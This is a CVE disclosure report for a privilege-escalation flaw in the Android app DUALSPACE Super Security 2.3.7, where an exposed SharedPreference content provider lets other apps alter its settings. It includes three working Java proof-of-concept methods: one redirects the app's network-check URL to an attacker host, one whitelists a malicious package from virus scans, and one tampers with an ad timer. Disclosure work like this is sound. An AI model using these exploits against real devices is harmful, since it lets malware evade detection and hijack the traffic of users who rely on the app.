Escalation of Privileges exists in Super Secuirty(CVE-2023-27192)
Vendor:DUALSPACE(http://www.dualspace.com/pc/en/products.html)
Affected product:Super Security (com.ludashi.security)
Version:2.3.7
Download link:https://apkpure.com/cn/super-security-virus-cleaner/com.ludashi.security
Description of the vulnerability for use in the CVE:An issue found in DUALSPACE Super Secuirty v.2.3.7 allows an attacker to gain privileges via the SharedPreference files.
Additional information:The app is a security application that provides several security-related functions. Upon opening, the app loads the SharedPreference files into memory and uses the data in some important functions. If a malicious app modifies important data in the SharedPreference files, the Super Security app will not behave properly when loading this data. This can cause many security hazards, such as controlling the server URL the victim app is going to access (by modifying the key_wifi_safe_net_check_url field), allowing malicious apps to add themselves to the virus check whitelist (by modifying the KEY_VIRUS_SCAN_WHITELIST field), ad blocking (by modifying the key_ad_new_user_avoid_time field), and more. Even worse, users cannot fix the security issue by rebooting victim devices, since the injected data is persistent in the SharedPreference files.
1.Controlling the server URL the victim app is going to access:
poc:
public void attack() {
ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
Uri uri = Uri.parse("content://com.ludashi.security.SharedPrefProvider");
ContentValues contentValues = new ContentValues();
contentValues.put("file_name","__default__");
contentValues.put("type",4);
contentValues.put("key","key_wifi_safe_net_check_url");
contentValues.put("value","www.xxx.com");
contentResolver.update(uri, contentValues,null,null);
}2.Allowing malicious apps to add themselves to the virus scan whitelist:
poc:
public void attack() {
ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
Uri uri = Uri.parse("content://com.ludashi.security.SharedPrefProvider");
ContentValues contentValues = new ContentValues();
contentValues.put("file_name","__default__");
contentValues.put("type",4);
contentValues.put("key","KEY_VIRUS_SCAN_WHITELIST");
contentValues.put("value","xxx.packagename");
contentResolver.update(uri, contentValues,null,null);
}KEY_VIRUS_SCAN_WHITELIST field:
3.ad blocking
poc:
public void attack() {
ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
Uri uri = Uri.parse("content://com.ludashi.security.SharedPrefProvider");
ContentValues contentValues = new ContentValues();
contentValues.put("file_name","__default__");
contentValues.put("type",2);
contentValues.put("key","key_ad_new_user_avoid_time");
contentValues.put("value","100000");
contentResolver.update(uri, contentValues,null,null);
}key_ad_new_user_avoid_time field:


